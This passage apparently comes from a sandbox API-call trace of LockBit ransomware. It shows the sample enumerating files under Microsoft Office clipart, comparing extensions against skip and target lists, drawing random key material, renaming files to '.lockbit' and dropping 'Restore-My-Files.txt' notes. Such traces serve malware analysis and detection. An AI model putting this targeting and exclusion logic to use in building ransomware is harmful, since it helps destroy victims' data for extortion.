lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0161.660] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0161.660] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0161.660] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0161.660] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0161.660] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0161.660] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0161.660] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0161.661] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0161.661] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0161.661] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.lockbit") returned 72 [0161.661] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.667] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.667] malloc (_Size=0x40068) returned 0x3df0008 [0161.667] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6880) returned 1 [0161.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.667] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.668] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.668] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.672] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.672] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.672] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.674] free (_Block=0x1fa2ed8) [0161.674] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.674] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.674] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.674] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9070c700, ftCreationTime.dwHighDateTime=0x1bd4b32, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9070c700, ftLastWriteTime.dwHighDateTime=0x1bd4b32, nFileSizeHigh=0x0, nFileSizeLow=0x5044, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00042_.WMF", cAlternateFileName="")) returned 1 [0161.674] lstrcmpiW (lpString1=".", lpString2="NA00042_.WMF") returned -1 [0161.674] lstrcmpiW (lpString1="..", lpString2="NA00042_.WMF") returned -1 [0161.674] PathFindExtensionW (pszPath="NA00042_.WMF") returned=".WMF" [0161.674] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.674] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.675] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.675] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.676] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00042_.WMF") returned 1 [0161.676] lstrcmpiW (lpString1="ntldr", lpString2="NA00042_.WMF") returned 1 [0161.676] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00042_.WMF") returned 1 [0161.676] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00042_.WMF") returned -1 [0161.676] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00042_.WMF") returned -1 [0161.676] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00042_.WMF") returned 1 [0161.676] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00042_.WMF") returned -1 [0161.676] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.676] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00042_.WMF") returned=".WMF" [0161.676] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.677] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.677] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.678] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.678] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.678] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.678] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00042_.WMF.lockbit") returned 72 [0161.678] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00042_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00042_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0161.679] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.679] malloc (_Size=0x40068) returned 0x1ff1e60 [0161.679] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20548) returned 1 [0161.679] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0161.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0161.680] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00042_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00042_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.685] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.685] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.686] free (_Block=0x1fa2ed8) [0161.686] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00042_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.686] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.686] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.687] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b49b100, ftCreationTime.dwHighDateTime=0x1bd4af3, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2b49b100, ftLastWriteTime.dwHighDateTime=0x1bd4af3, nFileSizeHigh=0x0, nFileSizeLow=0x2a42, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00057_.WMF", cAlternateFileName="")) returned 1 [0161.687] lstrcmpiW (lpString1=".", lpString2="NA00057_.WMF") returned -1 [0161.687] lstrcmpiW (lpString1="..", lpString2="NA00057_.WMF") returned -1 [0161.687] PathFindExtensionW (pszPath="NA00057_.WMF") returned=".WMF" [0161.687] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.687] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.688] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.688] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.689] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00057_.WMF") returned 1 [0161.689] lstrcmpiW (lpString1="ntldr", lpString2="NA00057_.WMF") returned 1 [0161.689] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00057_.WMF") returned 1 [0161.689] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00057_.WMF") returned -1 [0161.689] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00057_.WMF") returned -1 [0161.689] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00057_.WMF") returned 1 [0161.689] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00057_.WMF") returned -1 [0161.689] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.689] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00057_.WMF") returned=".WMF" [0161.690] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.690] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.690] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.691] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.691] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.691] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.691] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.691] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.691] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.691] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.691] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.691] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00057_.WMF.lockbit") returned 72 [0161.691] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00057_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0161.692] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.692] malloc (_Size=0x40068) returned 0x3d70450 [0161.692] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10818) returned 1 [0161.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0161.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0161.693] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0161.699] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00057_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00057_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.699] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.699] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.700] free (_Block=0x1fa2ed8) [0161.700] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00057_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.700] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.700] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.701] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21c04900, ftCreationTime.dwHighDateTime=0x1bd4af3, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21c04900, ftLastWriteTime.dwHighDateTime=0x1bd4af3, nFileSizeHigh=0x0, nFileSizeLow=0xeaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00058_.WMF", cAlternateFileName="")) returned 1 [0161.701] lstrcmpiW (lpString1=".", lpString2="NA00058_.WMF") returned -1 [0161.701] lstrcmpiW (lpString1="..", lpString2="NA00058_.WMF") returned -1 [0161.701] PathFindExtensionW (pszPath="NA00058_.WMF") returned=".WMF" [0161.701] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.701] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.702] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.702] 